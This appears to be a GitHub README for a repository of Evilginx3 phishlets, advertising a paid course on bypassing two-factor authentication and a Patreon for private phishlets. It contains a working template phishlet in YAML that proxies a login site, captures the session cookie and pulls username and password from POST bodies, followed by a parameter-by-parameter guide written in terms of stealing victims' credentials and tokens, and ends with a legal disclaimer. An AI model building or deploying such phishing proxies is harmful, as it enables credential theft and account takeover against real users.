I've dedicated substantial time and effort to create and update new phishlets for Evilginx3. In this repository, you'll find many custom Evilginx phishlets, finely crafted and updated to suit real-world applications.
Save 30% Off with Code: GITHUB30: www.simplerhacking.com/courses/evilginx-course
Learn to bypass 2FA with the latest version of Evilginx3, send verified campaigns, capture credentials, record & analyze campaign results.
MFA.Bypass.for.Google.Updated.from.SimplerHacking.Course.Preview.mp4
- Affordable Pricing: I've made the price of the course afforable for anyone interesting in learning about Evilginx & MITM Attacks.
- Great for all skill levels: The course is designed with clear explanations that make even complex topics easy to understand.
- Practical Application: Through hands-on labs & real customizeable templates, We help you apply what you learn in real-world scenarios.
- From Basics to Advanced: This course offers a smooth learning curve, foundation before diving into advanced features of Evilginx3.
- Custom Phishlets files & Resources: Personalized phishlet files, Q&A support & resources bridge the gap between theory & practice
Check our constantly updating our free Evilginx3 Phishlet Repository for Red Teams
You can find it here: https://github.com/simplerhacking/Evilginx3-Phishlets
Send us an email to [email protected] or message directly on our website www.simplerhacking.com
name: 'Your First Phishlet'
author: 'Simpler Hacking'
min_ver: '3.2.0'
proxy_hosts:
- { phish_sub: 'www', orig_sub: 'www', domain: '{domain}', session: true, is_landing: true }
sub_filters:
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['text/html', 'application/javascript', 'text/css', 'application/json', 'image/x-icon', 'text/plain', 'application/xml', 'image/*', 'font/*']}
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['application/x-www-form-urlencoded']}
auth_tokens:
- domain: '{domain}'
keys: ['session']
creds:
- key: 'username'
search: ['(.*)']
type: 'post'
- key: 'password'
search: ['(.*)']
type: 'post'
auth_urls:
- url_regex: 'https://{hostname}/login'
valid_statuses: [200]
login:
username: user
password: pass
url: https://www.{domain}/login
# This is just a demo example of a phishlet for 3.2.0
# You can find phishlets here: https://github.com/simplerhacking/Evilginx3-Phishlets
Explanation of Phishlet Parameters:
name:
Identifies the name of the phishlet.author:
Specifies the phishlet author.min_ver:
Specifies the minimum Evilginx version that is compatible with your phishlet.proxy_hosts:
Indicates the domain and subdomains to proxy. Thephish_sub
is the subdomain that the phishing page will imitate.sub_filters:
Allows the phishlet to replace instances of the actual domain name with the phishing domain, which is critical for the phishing page to function correctly.auth_tokens:
Identifies the cookies that should be captured from the victim's browser to gain access to the victim's session.creds:
This field determines the credentials that the phishlet is engineered to steal. Thekey
is the name of the credential (like username or password) andsearch
is a regular expression that the program will use to identify and extract these details from the user's input.auth_urls:
Defines the URLs that Evilginx will treat as the authenticated URLs. After the victim logs in, Evilginx will look out for a redirect to one of these URLs, at which point it will steal the listedauth_tokens
.login:
Here you specify the identifiers of the username and password fields in the login form on the original webpage. Theurl
is the link of the page where the victim enters their credentials.force_post:
If set to true, it forces the alteration of HTTP method from GET to POST.is_landing:
If set to true, it means that the page is a landing page for the phishing attack.js_inject:
This is where you can write some JavaScript to be injected in the webpage. It's typically used to enhance the phishing attack and ensure a smoother victim experience.domain:
This is a template variable used to replace target hostname used in phishlet configuration.
Follow our academic blog for more insights on security: https://medium.com/@simplerhacking
Gain access to more private Phishlets not available to the public on our Patreon.
By keeping these Evilginx3 Phishlets & scripts private & closed-source, I've ensured effectiveness in perpetuity.
Patreon: www.patreon.com/SimplerHacking
Enroll in our free training lessons & webinars: www.simplerhacking.com/courses/evilginx-webinar
The tools here are intended solely for legal and ethical use by cybersecurity professionals in controlled environments. Any illegal or malicious use is strictly prohibited. I disclaim all responsibility for any harm, loss, or damage that may arise from improper use.